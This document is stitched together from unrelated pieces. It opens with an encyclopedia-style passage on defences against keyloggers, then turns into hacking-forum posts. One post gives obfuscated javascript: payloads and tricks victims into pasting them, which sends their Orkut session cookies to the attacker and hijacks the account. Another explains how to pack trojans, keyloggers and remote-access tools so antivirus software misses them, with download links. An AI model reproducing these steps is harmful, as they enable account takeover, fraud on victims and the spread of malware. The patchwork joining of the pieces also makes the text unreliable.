Automatic form-filling programs can prevent keylogging entirely by not using the keyboard at all. Form fillers are primarily designed for web browsers to fill in checkout pages and log users into their accounts. Once the user's account and credit card information has been entered into the program, it will be automatically entered into forms without ever using the keyboard or clipboard, thereby reducing the possibility that private data is being recorded. (Someone with access to browser internals and/or memory can often still get to this information; if SSL is not used, network sniffers and proxy tools can easily be used to obtain private information too.)

It is important to generate passwords in a fashion that is invisible to keyloggers and screenshot utilities. Using a browser integrated form filler and password generator that does not just pop up a password on the screen is therefore key. Programs that do this can generate and fill passwords without ever using the keyboard or clipboard.

[edit] Alternative keyboard layouts

Most keylogging hardware/software assumes that a person is using the standard QWERTY keyboard layout, so by using a layout such as Dvorak, captured keystrokes are nonsense unless converted. For additional security, custom keyboard layouts can be created using tools like the Microsoft Keyboard Layout Creator.

[edit] One-time passwords (OTP)

Using one-time passwords is completely keylogger-safe because the recorded password is always invalidated right after it's used. This solution is useful if you are often using public computers where you can't verify what is running on them. One-time passwords also prevent replay attacks where an attacker uses the old information to impersonate. One example is online banking where one-time passwords are implemented and prevents the account from keylogging attacks as well as replay attacks.

[edit] Smart cards

Because of the integrated circuit of smart cards, they are not affected by keylogger and other logging attempts. A smart card can process the information and return back a unique challenge every time you login. The information cannot usually be used to login again.

[edit] On-screen keyboards

[edit] Program-to-program (non-web) keyboards

It is sometimes said that a third-party (or first party) on-screen keyboard program is a good way to combat keyloggers, as it only requires clicks of the mouse. However, this is not always true.

Most on screen keyboards (such as the onscreen keyboard that comes with Microsoft Windows XP) send keyboard event messages to the external target program to type text. Every software keylogger can log these typed characters sent from one program to another. Additionally, some programs also record or take snapshots of what is displayed on the screen (periodically, and/or upon each mouse click).

However, there are some on-screen keyboard programs that do offer some protection, using other techniques described in this article (such as dragging and dropping the password from the on-screen keyboard to the target program).

[edit] Web-based keyboards

Web-based on-screen keyboards (written in Javascript, etc.) may provide some degree of protection. At least some commercial keylogging programs do not record typing on a web-based virtual keyboard. (Screenshot recorders are a concern whenever entire passwords are displayed; fast recorders are generally required to capture a sequence of virtual key presses.)

Notably, the game MapleStory uses, in addition to a standard alphanumeric password, a 4-digit PIN code secured by both on-screen keyboard entry and a randomly changing button pattern; there is no real way to get the latter information without logging the screen and mouse movements; another MMORPG called RuneScape makes a similar system available for players to protect their in-game bank accounts.

[edit] Anti-keylogging software

Keylogger detection software is also available. Some of this type of software use "signatures" from a list of all known keyloggers. The PC's legitimate users can then periodically run a scan from this list, and the software looks for the items from the list on the hard-drive. One drawback of this approach is that it only protects from keyloggers on the signature-based list, with the PC remaining vulnerable to other keyloggers.

Other detection software doesn't use a signature list, but instead analyzes the working methods of many modules in the PC, allowing it to block the work of many different types of keylogger. One drawback of this approach is that it can also block legitimate, non-keylogging software. Some heuristics-based anti-keyloggers have the option to unblock known good software, but this can cause difficulties for inexperienced users.

[edit] Speech recognition

Similar to on-screen keyboards, speech-to-text conversion software can also be used against keyloggers, since there are no typing or mouse movements involved. The weakest point of using voice-recognition software may be how the software sends the recognized text to target software after the recognition took place.

[edit] Handwriting recognition and mouse gestures

Also, many PDAs and lately Tablet PCs can already convert pen (also called stylus) movements on their touchscreens to computer understandable text successfully. Mouse gestures utilize this principle by using mouse movements instead of a stylus. Mouse gesture programs convert these strokes to user-definable actions, among others typing text. Similarly, graphics tablets and light pens can be used to input these gestures, however, these are getting used less commonly everyday.

The same potential weakness of speech recognition applies to this technique as well.

[edit] Macro expanders/recorders

With the help of many Freeware/Shareware programs, a seemingly meaningless text can be expanded to a meaningful text and most of the time context-sensitively, e.g. we can be expanded en.Wikipedia.org when a browser window has the focus. The biggest weakness of this technique is that these programs send their keystrokes directly to the target program. However, this can be overcome by using the 'alternating' technique described below, i.e. sending mouse clicks to non-responsive areas of the target program, sending meaningless keys, sending another mouse click to target area (e.g. password field) and switching back and forth.

[edit] Window transparency

Using many readily available utilities, the target window could be made temporarily transparent, in order to hinder screen-capturing by advanced keyloggers.^{[citation needed]} Although not a fool-proof technique against keyloggers on its own, this could be used in combination with other techniques.

[edit] Non-technological methods

Some keyloggers can be fooled by alternating between typing the login credentials and typing characters somewhere else in the focus window.^[8] Similarly, a user can move their cursor using the mouse during typing, causing the logged keystrokes to be in the wrong order.^{[dubious – discuss]} Lastly, someone can also use context menus to remove, copy, cut and paste parts of the typed text without using the keyboard.

Another very similar technique utilizes the fact that any selected text portion is replaced by the next key typed. E.g. if the password is "secret", one could type "s", then some dummy keys "asdfsd". Then these dummies could be selected with mouse, and next character from the password "e" is typed, which replaces the dummies "asdfsd"

Hack Orkut Accounts

If This Doesn’t Work, Please Refer To The “Hot To Hack Gmail, Yahoo, Hotmail, Orkut, or any other” Post - It Has Been Tested, And It Works

First get firefox and the cookie editor plugin for it…u will need them…

Then make two fake accounts…u will ned one to receive the cookie and one to advertise your script so that if orkut starts deleting such profiles your real account wont be compromised…the choice is yours though..

javascript:nobody=replyForm;nobody.toUserId.value=62915936;
nobody.scrapText.value=eval
(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,
111,111,107,105,101)); nobody.action=’Scrapbook.aspx?Action.writeScrapBasic’;
nobody.submit()

U see the 62915936 part? Thats the one u need to edit to get the cookie to your account…..

Now here is the script Code:

HOW TO PUT UR NUMBER IN THAT SECTION??? FOLLOW THESE STEPS:

1) Go to YOUR ALBUM section.

2) Go to ANY photo and right click on it , see the properties of your display image…u will see something like 12345678.jpg

3) There will be a eight digit value.

4) Now put that value in the above javascript.

5) Thats it.

Now your javascript will look like:

javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval
(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,
111,111,107,105,101));
nobody.action=’Scrapbook.aspx?Action.writeScrapBasic’;
nobody.submit()

Now give this script to the victim , ask him to go to his scrap book and paste this script in his address bar and press enter. now you ll get his cookies in your scrapbook.

Now after getting a cookie…

1) Go to your home page

2) Open the cookie editor plugin(TOOLS–>COOKIE EDITOR).

3) Type orkut in the text box and click filter/refresh.look for orkut_state cookie.

4) Just double click it and replace the orkut_state part with your victims. No need to change the _umbz _umbc part…

5) THATS IT!!

ANOTHER SCRIPT : (100%working)

javascript:nobody=replyForm;nobody.toUserId.value=53093255;

nobody.scrapText.value=document.cookie;nobody.

action=’scrapbook.aspx?Action.submit’;nobody.submit()

Put ur eight digit number in the place of (53093255)

How to make ALL Trojan>Virus>Keylogger UNDETECTABLE!

This tutorial tells you how to make a Trojan, Virus, Keylogger, or anything that would be found harmful, NOT. This tutorial explains how to make all files look %100 clean (become clean and be %100 UNDETECTABLE from ALL ANTIVIRUSES!!!!! ALL!!!!!)Ready? GO!

First, get your trojan, virus or keylogger, or server or w/e you plan on using to become undetectable, and get it ready. Fix it up, create it, whatever.

My personal favorite
keylogger: Ardamax Keylogger
Remote Administration Tool (Must not have a router): Poisin Ivy
Google is your friend.

Now that you have your trojan, virus or keylogger or w/e harmful ready, its time to make it UNDETECED!

1. Download Software Passport (Armadillo) by Silicon Realms. This is THE best binder out there I know of, it makes everything %100 UNDETECTABLE BY ALL ANTIVIRUSES (including Norton, Kaspersky, Avast, etc)… The direct link to dl the program is here:
Code:
http://nct.digitalriver.com/fulfill/0161.001

There is a form to fill out information, so put in your real email address, and then you’ll recieve a download link in your email (it might be in Spam, Junk mail section so beware.)

2. Once you download the program, install it.
3. Once installed, you open it up and see this:
Code:
http://img339.imageshack.us/img339/6…assportzh3.jpg

This is the program. Now that you have it open, you might be confused on what the hell to do, right? Well, this is what you do!

1. Download this pre-made settings. These settings are pre-made by me so you won’t be confused. Everything is working.

DOWNLOAD THIS FOR THE PRE-MADE SETTINGS:
Code:
http://rapidshare.com/files/8749860/projects.arm.html

DOWNLOAD THIS FOR THE BACKUP (You need this in the same location as the projects.arm file) YOU NEED THIS FILE ALSO!
Code:
http://rapidshare.com/files/8750048/projects.Stats.html

Now, when you download these files, and you put them in the SAME FOLDER (or same location), open Software Passport again and click Load Existing Project (top left).

Where it says “Files to Protect” (if theres stuff there, delete it):
Add the files you want to make %100 UNDETECTABLE!!

Now, once done, go to the bottom right and click “Build Project”. A bunch of windows will come up, just click Yes and OK.

Now, once its created, they are %100 undetectable. Go to
Code:

Computer Collegiate Cummunity only for (Ccians) discuss ur Work & Idea .

http://www.orkut.com/Main#Community.aspx?cmm=74799129